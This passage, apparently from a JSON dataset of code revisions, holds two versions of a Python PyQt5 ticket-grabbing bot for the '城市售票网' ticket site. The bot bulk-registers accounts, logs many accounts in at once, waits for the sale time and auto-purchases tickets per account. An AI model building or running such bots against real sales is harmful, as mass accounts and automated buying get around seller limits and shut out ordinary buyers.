i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = Example()\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n",
"step-4": "import ctypes\nimport win32con\nimport request_spider\nfrom selenium_tickets_spider import *\nfrom threading import Thread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\nimport sys, time, re\nimport datetime\nSESSION_DATA = False\nSHOW_S_P = False\n\n\nclass Worker(QThread):\n valueChanged = pyqtSignal(int)\n handle = -1\n\n def run(self):\n global SESSION_DATA, EXIT_COND\n try:\n self.handle = ctypes.windll.kernel32.OpenThread(win32con.\n PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))\n except Exception as e:\n print('get thread handle failed', e)\n while True:\n if SESSION_DATA:\n self.valueChanged.emit(1024)\n SESSION_DATA = False\n time.sleep(0.1)\n\n def exit_thread(self):\n os._exit(122)\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n 
self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n 
self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = 
QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n 
self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = 
self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = 
ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' % tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = 
QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if 
i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = Example()\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n",
"step-5": "import ctypes\nimport win32con\nimport request_spider\nfrom selenium_tickets_spider import *\nfrom threading import Thread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\nimport sys, time, re\nimport datetime\n\nSESSION_DATA = False\nSHOW_S_P = False\n\nclass Worker(QThread):\n\n valueChanged = pyqtSignal(int) # 值变化信号\n handle = -1\n\n def run(self):\n global SESSION_DATA,EXIT_COND\n try:\n self.handle = ctypes.windll.kernel32.OpenThread( # @UndefinedVariable\n win32con.PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))\n except Exception as e:\n print('get thread handle failed', e)\n # print('thread id', int(QThread.currentThreadId()))\n # 循环发送信号\n while True:\n if SESSION_DATA:\n self.valueChanged.emit(1024)\n SESSION_DATA = False\n time.sleep(0.1)\n\n def exit_thread(self):\n os._exit(122)\n\n\nclass Ui_MainWindow(QMainWindow):\n\n threads = []\n keywordJudge = ''\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n # self.ex = Example()\n\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status,self.output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n\n # 子线程\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n # MainWindow.setStyleSheet(\"#MainWindow{background-color: yellow}\")\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(640, 478)\n # MainWindow.setMinimumSize(640, 478)\n # MainWindow.setMaximumSize(640, 478)\n # 取消最大化\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n # 固定窗口大小\n MainWindow.setFixedSize(self.width(), self.height())\n # MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint) \n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n 
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName(\"tabWidget\")\n\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName(\"tab\")\n\n # 登录按钮\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName(\"pushButton\")\n\n # 登陆个数输入框\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(\" 请输入登陆个数\")\n\n # 登录日志输出\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName(\"label_0\")\n\n # 注册日志\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName(\"textBrowser_2\")\n\n\n # 登录页面\n self.tabWidget.addTab(self.tab, \"\")\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName(\"tab_2\")\n\n self.tabWidget.addTab(self.tab, \"\")\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName(\"tab_3\")\n\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName(\"lineEdit\")\n\n # 查询商品名称\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.pushButton_2.clicked.connect(self.search_1)\n\n\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName(\"label\")\n\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName(\"label_2\")\n\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n 
self.comboBox.setObjectName(\"comboBox\")\n # self.comboBox.currentText()\n\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName(\"comboBox_2\")\n\n # 选择数量\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName(\"label_3\")\n\n # 数量输入框\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName(\"lineEdit_1\")\n\n # 购买成功数量\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName(\"label_6\")\n\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName(\"label_7\")\n self.label_7.setStyleSheet(\"font-size:16px;color:red\") # 设置字体颜色\n\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName(\"label_8\")\n\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName(\"lineEdit_8\")\n self.lineEdit_8.setText('4')\n\n # 购买按钮 当所有条件选择完之后点击\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.pushButton_3.clicked.connect(self.search_2)\n\n # 退出程序按钮\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName(\"pushButton_quit\")\n self.pushButton_quit.clicked.connect(self.exit_quit)\n\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName(\"label_4\")\n\n # 购买日志输出\n self.textBrowser_1 = 
QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName(\"textBrowser\")\n # 添加显示数据\n # self.textBrowser_1.append('购买日志')\n\n # 抢票中心页面\n self.tabWidget.addTab(self.tab_2, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n # 账号注册页面\n self.tabWidget.addTab(self.tab_3, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n # 点击注册按钮\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName(\"pushButton\")\n\n # 注册个数输入框\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(\" 请输入注册个数\")\n\n # 注册日志输出\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName(\"textBrowser_3\")\n\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName(\"label_5\")\n\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"城市售票网-抢票\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"点击登录\"))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \"账号登录\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \"抢购中心\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate(\"MainWindow\", \"账号注册\"))\n 
self.label_0.setText(_translate(\"MainWindow\", \"登录日志:\"))\n self.pushButton_2.setText(_translate(\"MainWindow\", \"搜索名称\"))\n self.pushButton_3.setText(_translate(\"MainWindow\", \"点击购买\"))\n self.pushButton_quit.setText(_translate(\"MainWindow\", \"退出程序\"))\n self.pushButton_4.setText(_translate(\"MainWindow\", \"点击注册\"))\n self.label.setText(_translate(\"MainWindow\", \"已择场次:\"))\n self.label_2.setText(_translate(\"MainWindow\", \"已择价格:\"))\n self.label_3.setText(_translate(\"MainWindow\", \"购买总数量:\"))\n self.label_4.setText(_translate(\"MainWindow\", \"购买日志:\"))\n self.label_5.setText(_translate(\"MainWindow\", \"注册日志:\"))\n self.label_6.setText(_translate(\"MainWindow\", \"已购买:\"))\n self.label_7.setText(_translate(\"MainWindow\", \"0\"))\n self.label_8.setText(_translate(\"MainWindow\", \"每个账号购买数量:\"))\n self.textBrowser_3.setText(\"\")\n self.textBrowser_2.setText(\"\")\n self.textBrowser_1.setText(\"\")\n\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n\n # 点击登录执行\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # 提示框\n return\n ipList = [\"\"]\n # ipList = request_tickets_spider.get_ip_list(10)\n self.textBrowser_2.append(\"开始登陆,请等待...\")\n userinfo_list = []\n with open('infomation.txt', 'rt', 